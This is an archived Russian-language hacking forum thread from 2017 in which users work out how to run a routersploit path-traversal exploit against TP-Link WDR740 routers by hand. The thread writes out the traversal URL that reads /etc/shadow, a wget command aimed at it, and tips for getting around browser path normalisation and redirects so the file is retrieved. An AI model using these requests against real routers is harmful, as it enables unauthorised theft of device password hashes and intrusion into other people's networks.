Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Как использовать сплоит из routersploit вручную? (https://forum.antichat.xyz/showthread.php?t=448300)

egozalet 19.02.2017 03:50
Как использовать сплоит из routersploit вручную?

https://github.com/reverse-shell/ro...its/tplink/wdr740nd_wdr740n_path_traversal.py

Сделать Get запрос на - http://IP/help/../../../../../../../.../../etc/shadow ?

egozalet 19.02.2017 04:30
Цитата:
Сообщение от ok-
ok- said:

Сделать Get запрос на -
http://IP/help/../../../../../../../.../../etc/shadow
?
http://192.168.0.1/help/../../../../.../../etc/shadow

http://192.168.1.1/help/../../../../.../../etc/shadow[/QUOTE]

Через Routersploit - Работает уязвимость

Через хром,мозилла,сафари - выдает окно о том что пароль неверный и автоматически сокращает до http://192.168.1.1/etc/shadow

если wget'om, то -

wget http://xx.xx.xx.xx:8080/help/../../..../../etc/shadow

HTTP request sent, awaiting response... 501 Not Implemented

egozalet 19.02.2017 04:39
Вот тут это работает. Странно!

http://www.websec.mx/img/tplink-path-traversal.png

rudu2 27.02.2017 00:34
Цитата:
Сообщение от egozalet
egozalet said:

Вот тут это работает. Странно!
http://www.websec.mx/img/tplink-path-traversal.png
нечего странного там редиректит тебя просто

egozalet 27.02.2017 09:45
Цитата:
Сообщение от rudu2
rudu2 said:

нечего странного там редиректит тебя просто
А как тогда получить руками результат?

rudu2 27.02.2017 11:25
Цитата:
Сообщение от egozalet
egozalet said:

А как тогда получить руками результат?
отключить редирект в браузере)


Время: 14:55